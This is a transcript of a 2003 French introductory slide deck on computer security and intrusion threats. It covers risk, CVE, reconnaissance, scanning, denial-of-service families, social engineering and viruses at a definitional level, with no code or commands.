Introduction à La Sécurité Informatique 1/2
-
Upload
sylvain-maret -
Category
Technology
-
view
6.200 -
download
4
description
Transcript of Introduction à La Sécurité Informatique 1/2
![Page 1: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/1.jpg)
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50
[email protected] | www.e-xpertsolutions.com
Sécurité contre l’intrusion informatiquepartie 1
Sylvain Maret / version 1Mars 2003
![Page 2: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/2.jpg)
Solutions à la clef
Agenda
Introduction à la sécurité informatique Ethical Hacking Les outils de sécurité
Firewalls IDS
Introduction à PKI Architecture PKI Sytème d’authentification
![Page 3: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/3.jpg)
Solutions à la clef
Introduction
Deux grands axes Les attaques Les outils à disposition
Le cours n’est pas exhaustif Chaque sujet est une spécialité Tous les jours des nouvelles techniques
Ethical Hacking Connaître les méthodes pour mieux se défendre Aucun nom de programmes de hacking « destructif »
![Page 4: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/4.jpg)
Solutions à la clef
Programme du cours: volume 1
Définition de la sécurité informatique Estimation du risque Les menaces Les vulnérabilités CVE Evolution dans le temps
![Page 5: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/5.jpg)
Solutions à la clef
Programme du cours: volume 1
Obtention d’informations Scanners Social Engineering Virus, Trojan, Backdoor D0S, DDoS SMTP Compromission Système BoF Sniffer Web Wireless Etc.
![Page 6: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/6.jpg)
Solutions à la clef
Programme du cours: volume 2
Les outils de sécurité Firewall IDS Systèmes d’authentification PKI Proxy Honeypot, Honeynet VPN Etc.
![Page 7: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/7.jpg)
Solutions à la clef
La sécurité informatique ?
Protection du système d’informations les biens de l’entreprise
Une démarche globale Engagement de la direction de l’entreprise Classification des biens
Estimation des risques Définition d’une politique de sécurité Mise en oeuvre de la politique de sécurité
Une démarche constante
![Page 8: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/8.jpg)
Solutions à la clef
Définition: système d’informations
Organisation des activités consistant à acquérir, stocker, transformer, diffuser, exploiter, gérer … les informations
Un des moyens pour faire fonctioner un système d’information est l’utilisation d’un système informatique
![Page 9: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/9.jpg)
Solutions à la clef
Exemple de biens informatiques
Le système de production Industrie, Banques
Les informations financières Les informations commerciales Le système de commerce électronique Les bases de données Les brevets, inventions Etc.
![Page 10: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/10.jpg)
Solutions à la clef
Les objectifs de sécurité
Diminution des risques (tendre vers zéro…) Mettre en œuvre les moyens pour préserver:
La confidentialité L’intégrité L’authentification L’autorisation La non-répudation La disponibilité
![Page 11: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/11.jpg)
Solutions à la clef
Estimation du risque
Risque = Coûts * Menaces * Vulnérabilités
$
![Page 12: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/12.jpg)
Solutions à la clef
Les coûts d’une attaque ?
Déni de services (perte de productivité) Perte ou altération des données Vol d’informations sensibles Destruction des systèmes Compromission des systèmes Atteinte à l’image de l’entreprise Etc.
![Page 13: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/13.jpg)
Solutions à la clef
Les menaces: communauté « Black Hat » ou « Hackers »
Source: CERT 2002
![Page 14: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/14.jpg)
Solutions à la clef
Les menaces: tendances
Les « Black Hat » sont de mieux en mieux organisés
Sites Web Conférences
Attaques sur Internet sont faciles et difficilement identifiables (peu de traces)
Outils d’intrusion sont très évolués et faciles d’accès
![Page 15: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/15.jpg)
Solutions à la clef
Sources d’informations
Sites Internet Conférences
Black Hat Defcon Etc.
Journaux IRC, Chat Publications Ecoles de « hacking » Etc.
![Page 16: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/16.jpg)
Solutions à la clef
Leurs motivations ?
Le profit et l’argent Avantage compétitif Espionnage Vengeance Revendication Curiosité Gloire Etc.
![Page 17: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/17.jpg)
Solutions à la clef
Evolution des attaques
Source: CERT 2001
![Page 18: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/18.jpg)
Solutions à la clef
Pyramide des menaces
Source: RBC Capital Market
![Page 19: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/19.jpg)
Solutions à la clef
Les vulnérabilités
Augmentation significative des vulnérabilités Pas de « design » pensé sécurité Complexité du système d’information Besoins Marketing (Software) Evolution très (trop) rapide des technologies Etc.
Le maillon faible est l’humain…
![Page 20: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/20.jpg)
Solutions à la clef
Augmentation des vulnérabilités
Environ 80 nouvelles vulnérabilités par semaine en 2002
Et 2003 ?
Source: CERT octobre 2002
![Page 21: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/21.jpg)
Solutions à la clef
Incidents reportés par le CERT
Environ 1’800 incidents par semaine en 2002
Et 2003 ? 0
5000
10000
15000
20000
25000
1988 1989 1990 1991 1992 1993 1994 1995 1996 1997 1998 1999 2000
Source: CERT octobre 2002
![Page 22: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/22.jpg)
Solutions à la clef
CVE: Common Vulnerabilities and Exposures
Définition commune d’une vulnérabilité
De facto standard pour les constructeurs
Processus de validation par le CVE
1er phase: canditature CAN-2002-xxx
2ème phase: acceptation ? CVE-2002-xxx
Source: CVE 2002
![Page 23: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/23.jpg)
Solutions à la clef
CVE: une nouvelle vulnérabilité PHP
Organization Name
CERT CA-96.06.cgi_example_code
CyberSafe Network: HTTP ‘phf’ Attack
ISS http-cgi-phf
AXENT phf CGI allows remote command execution
Bugtraq PHF Attacks – Fun and games for the whole family
BindView #107 – cgi-phf
Cisco #3200 – WWW phf attack
IBM ERS Vulnerability in NCSA/Apache Example Code
CERIAS http_escshellcmd
NAI #10004 - WWW phf check
Source: CVE 2002
![Page 24: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/24.jpg)
Solutions à la clef
CVE: produits de sécurité
Source: CVE 2002
![Page 25: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/25.jpg)
Solutions à la clef
Evolution des entrées CVE
Se
p-9
9O
ct-9
9N
ov-
99
De
c-9
9Ja
n-0
0F
eb
-00
Ma
r-0
0A
pr-
00
Ma
y-0
0Ju
n-0
0Ju
l-00
Au
g-0
0S
ep
-00
Oct
-00
No
v-0
0D
ec-
00
Jan
-01
Fe
b-0
1M
ar-
01
Ap
r-0
1M
ay-
01
Jun
-01
Jul-0
1A
ug
-01
Se
p-0
1O
ct-0
1N
ov-
01
De
c-0
1Ja
n-0
2F
eb
-02
Ma
r-0
2A
pr-
02
Ma
y-0
2Ju
n-0
2
0
500
1000
1500
2000
2500
3000
3500
4000
4500
5000
Source: CVE 2002
Candidates
CVE Entries
![Page 26: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/26.jpg)
Solutions à la clef
Vulnérabilités: Top 20
Source: CERT octobre 2002
![Page 27: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/27.jpg)
Solutions à la clef
Les tendances: les firewalls ne sont plus suffisants !
Attaques des applications 70 % des attaques http
(Gartner 2002) B0F: 60% des problèmes
(CERT 2002) 3 sites Web sur 4 sont
vulnérables (Gartner 2002)
![Page 28: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/28.jpg)
Solutions à la clef
Influence du temps ?
La sécurité est un processus permanent Et non un produit…
L’idée: Maintenir en permanence les vulnérabilités au plus bas Suivre les recommandations des constructeurs
(patchs, update, etc.) Amélioration de l’architecture de sécurité Evaluation des systèmes
Audit Tests d’intrusions
![Page 29: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/29.jpg)
Solutions à la clef
Evolution des risques dans le temps ?
Risque
TempsRisquesacceptésaujourd’hui
Risquesde demain
![Page 30: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/30.jpg)
Solutions à la clef
Cycle d’une vulnérabilité
TimeGap
Source: CERT 2002
![Page 31: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/31.jpg)
Solutions à la clef
Evolution dans le temps
Time
Ideal Gap
Growing Gap
Source: CERT 2002
![Page 32: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/32.jpg)
Solutions à la clef
Peut-on prévenir les intrusions ?
Source: CERT 2002
![Page 33: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/33.jpg)
Solutions à la clef
L’idée: diminuer le risque et maintenir cette démarche
Risque initial
Risque accepté
![Page 34: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/34.jpg)
Solutions à la clef
Quel montant faut il investir ?
Risque
Coûts
Risquesacceptés
![Page 35: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/35.jpg)
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50
[email protected] | www.e-xpertsolutions.com
Les attaques
![Page 36: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/36.jpg)
Solutions à la clef
Obtention d’informations
La première phase avant une attaque Obtention d’informations passives
Recherche par le Web (google) NIC, Ripe Whois Sam Spade Registre du commerce Etc.
![Page 37: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/37.jpg)
Solutions à la clef
Recherche du nom de domaine
![Page 38: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/38.jpg)
Solutions à la clef
Obtention d’informations des « Domain Name Server »
Obtention d’informations techniques DNS MX Record Zone transfert (si possible) Etc.
Les Outils DIG Nslookup Host Etc.
![Page 39: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/39.jpg)
Solutions à la clef
Exemple: recherche des entrées de messagerie (MX Record)
![Page 40: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/40.jpg)
Solutions à la clef
Exemple: essais d’un « zone transfer »
![Page 41: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/41.jpg)
Solutions à la clef
Exemple: essais d’un « zone transfer »
Transfert interdit
![Page 42: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/42.jpg)
Solutions à la clef
Les scanners: identification à distance des systèmes
Technique d’identification des systèmes et des applications
Processus d’obtention d’informations (information gathering)
Phase d’approche préalable à une attaque Facteur déterminant lors d’une attaque
Objectif: identifier de manière précise le type de système pour mieux cibler son attaque
En déduire ses vulnérabilités
![Page 43: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/43.jpg)
Solutions à la clef
Types de scanners
Scanner de ports ou services Scanner de type « OS Fingerprint » Scanner de vulnérabilitées
Scanner générique Scanner de type « WEB Scanner » Scanner de base de données
SQL server Oracle Etc.
![Page 44: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/44.jpg)
Solutions à la clef
Scanner de ports
Objectif: cartographier de manière précise les services offert par une machine ou un réseau de machines
Serveur Web Server DNS Messagerie Serveur FTP Server Real Service Microsoft Service SSH IPSEC Firewall Etc.
![Page 45: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/45.jpg)
Solutions à la clef
Scanner de ports
Scan de ports TCP et UDP voir ICMP Option de scan:
Scan ouvert (Vanilla TCP Scan) Scan demi-ouvert Scan furtif Scan très lent Etc.
L’idée: ne pas se faire détecter par un IDS Scanner est un art !
![Page 46: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/46.jpg)
Solutions à la clef
Scan ouvert (Standard TCP Connect)
Source:Matta Security 2002
![Page 47: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/47.jpg)
Solutions à la clef
Scan demi-ouvert (Half-Open Syn Scan)
Source:Matta Security 2002
![Page 48: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/48.jpg)
Solutions à la clef
Scan Furtif (Hosts Unix)
Source:Matta Security 2002
![Page 49: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/49.jpg)
Solutions à la clef
UDP Scan
Source:Matta Security 2002
![Page 50: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/50.jpg)
Solutions à la clef
Scanner de ports pour Windows
Cible
Attaquant
0-n
![Page 51: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/51.jpg)
Solutions à la clef
Scanner de ports: NMAP pour Unix
![Page 52: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/52.jpg)
Solutions à la clef
« OS Fingerprint » ou prise d’empreinte
Objectif: détermininer de manière précise le type de système d’exploitation et de service
Win2k, Solaris 2.7, IOS 11.x, Red Hat, Mac, etc. Apache 2.x, Sendmail 8.x, IIS v5, Checkpoint, etc.
Approche passive et active L’idée: ne pas se faire détecter par un IDS
![Page 53: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/53.jpg)
Solutions à la clef
« OS Fingerprint »: illustration
![Page 54: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/54.jpg)
Solutions à la clef
« OS Fingerprint »: les techniques
SourceIntranode 2001
![Page 55: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/55.jpg)
Solutions à la clef
« OS Fingerprint »: analyse de banière
SourceIntranode 2001
![Page 56: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/56.jpg)
Solutions à la clef
« OS Fingerprint »: analyse de banière
![Page 57: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/57.jpg)
Solutions à la clef
« OS Fingerprint »: intérogation TCP/IP
SourceIntranode 2001
![Page 58: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/58.jpg)
Solutions à la clef
« OS Fingerprint »: les outils
Nmap Queso XProbe2 Ring HMAP (Web Serveurs) Smtpscan Etc.
![Page 59: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/59.jpg)
Solutions à la clef
Scanner de vulnérabilités
Deux grandes familles Product Based Solution Service Based Solution
Updates automatique Signatures de vulnérabilités
Généralement compatible CVE Certains produits disponibles en Open Source
![Page 60: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/60.jpg)
Solutions à la clef
Scanner de vulnérabilités
Outils très complets (mais généraliste) Services WEB FTP, DNS, SNMP, etc. NetBios (Microsoft) SSH Servers RPC D0S Database Mail Etc.
![Page 61: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/61.jpg)
Solutions à la clef
Scanner de vulnérabilités: Nessus
![Page 62: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/62.jpg)
Solutions à la clef
Scanner mode ASP
Tests d’intrusions réalisés par un centre de tests d’intrusions
Les tests sont réalisés à la demande ou de façon automatique
Le résultat est consultable, en ligne, par un navigateur Web
Les cibles à tester sont principalement des services frontaux (Internet, Extranet)
![Page 63: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/63.jpg)
Solutions à la clef
Exemple: scanner mode ASP
Source: Qualys 2002
![Page 64: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/64.jpg)
Solutions à la clef
Web Scanner
Outils de tests d’intrusions pour les services Web Outils très spécialisés Tests très poussés au niveau des applications
CGI Cookies Unicode B0F BackDoor Hiden Field Brute force XSS, CSS Etc.
![Page 65: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/65.jpg)
Solutions à la clef
Déni de services: DoS ou DDoS
Atteinte au bon fonctionnement d’un système Immobilisation ou « gel » Utilisation massive des ressources CPU Utilisation massive de la bande passante Crash du système
Voir perte de données
![Page 66: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/66.jpg)
Solutions à la clef
Déni de services: DoS ou DDoS
4 grandes familles Les « destructeurs » de système Les Floodings Les « dévoreurs » de bande passante ou ressources
CPU Les Mails Bombs
![Page 67: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/67.jpg)
Solutions à la clef
Les destructeurs de système
Attaques qui « crash » les systèmes Pratiquement invisible
Exploitent les vulnérabilités des systèmes d’exploitation ou des applications
Beaucoup de problèmes avec Windows NT Attaques de type
Ping of death Teardrop Land Targa Etc.
![Page 68: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/68.jpg)
Solutions à la clef
Exemple: destruction d’un système
Source: Gibson Research Corparation 2002
![Page 69: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/69.jpg)
Solutions à la clef
Exemple d’outils D0S pour Microsoft
![Page 70: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/70.jpg)
Solutions à la clef
Flooding
Litéralement: « l’inondation » d’un système Attaques de type
Syn-Flood Log-Flood Data-Flood
![Page 71: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/71.jpg)
Solutions à la clef
Attaque Syn-Flood
Exploitation du mécanisme d’établissement d’une connexion TCP
Immobilisation du système Peut dans certains cas « crasher » le système Pratiquement anonyme
Spoofing d’adresse IP source
![Page 72: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/72.jpg)
Solutions à la clef
Initialisation d’une connexion TCP en trois phases
Source: Gibson Research Corparation 2002
![Page 73: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/73.jpg)
Solutions à la clef
Attaque de type Syn-Flood
Source: Gibson Research Corparation 2002
![Page 74: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/74.jpg)
Solutions à la clef
Exemple: Syn-Flood
Source: Gibson Research Corparation 2002
![Page 75: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/75.jpg)
Solutions à la clef
Les dévoreurs de ressources
Utilisation massive de la bande passante ou des ressources CPU
La plus connue est Smurf
![Page 76: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/76.jpg)
Solutions à la clef
Exemple: Smurf
Source: Gibson Research Corparation 2002
![Page 77: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/77.jpg)
Solutions à la clef
Distributed Denial of Service (DDoS)
Amplification des attaques D0S Attaques très dangereuses Peut impliquer jusqu’à un millier de machines
attaquantes Outils Open Source
![Page 78: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/78.jpg)
Solutions à la clef
DDoS: fonctionnement de base
Source: Gibson Research Corparation 2002
![Page 79: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/79.jpg)
Solutions à la clef
Exemple: DDoS
Source: Gibson Research Corparation 2002
![Page 80: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/80.jpg)
Solutions à la clef
Les Mails Bombs
Programmes qui envoient des mails en quantité massive
Mails obscènes Mails en quantité énormes Abonnement à des mailling lists Fichiers attachés gigantesques Etc.
Très difficile à stopper Très difficile à tracer
Relais de messagerie anonyme
![Page 81: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/81.jpg)
Solutions à la clef
Exemple: mail bomber…
![Page 82: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/82.jpg)
Solutions à la clef
Social Engineering
« The weakest link in the chain is the people »
Kevin Mitnik
![Page 83: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/83.jpg)
Solutions à la clef
Social Engineering
Technique dans le but d’0btenir des informations confidentielles pour préparer une attaque
Utilisation du téléphone Utilisation de l’ e-mail Utilisation d’un fax ou du courier Vol de documents, photos, vol de matériels, etc Manipulation psychologique Etc.
![Page 84: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/84.jpg)
Solutions à la clef
Social Engineering: la messagerie
Source: Hacknet 2002
![Page 85: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/85.jpg)
Solutions à la clef
Social Engineering: le petit cadeau…
![Page 86: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/86.jpg)
Solutions à la clef
Les virus
Une des plus grande menace pour les entreprises
Pus de 90 % des entreprises ont subi des attaques virales
Le temps de propagation est de plus en plus rapide !
Coût moyen d’une attaque: 105’000 .- CHF Environ 20 jours / homme de travail
Source: ICSA 2001
![Page 87: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/87.jpg)
Solutions à la clef
Evolution du nombre de virus
F-SecureSeptembre 2001
![Page 88: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/88.jpg)
Solutions à la clef
Virus: définition
Un virus est un programme qui se réplique en s’attachant à un autre objet
Un ver (Worm) est un programme qui se réplique de façon indépendante
![Page 89: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/89.jpg)
Solutions à la clef
Anatomie d’un virus
Une routine de réplication Cette partie est obligatoire pour être un virus Autrement il s’agit d’un « Malware »
Une routine de type « payload » Partie optionnelle qui effectue une action
Destruction, Vol d’information, etc. Affichage d’une image ou vidéo, etc. Son Etc.
![Page 90: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/90.jpg)
Solutions à la clef
Différents types de virus
Boot sector viruses Traditional files viruses Document et macro viruses 32 bits files viruses Worms (mail worm / pure worm) Malware
Cheval de Troie Backdoor Spyware Etc.
![Page 91: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/91.jpg)
Solutions à la clef
Cheval de Troie ou trojan
Définition: Un programme légitime qui exécute des actions indésirables Ne se réplique pas Fait partie de la famille des virus au sens large du terme Aussi connu sous le nom de « PESTS » Exemple: un jeux qui installe un key logger
Le moyen de transport est souvent la messagerie ou un site web
Une fois executé, il installe: Un Malware, Spyware Une Back Door Etc.
![Page 92: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/92.jpg)
Solutions à la clef
Evolution des « PESTS »
Source: PestPatrol 2001
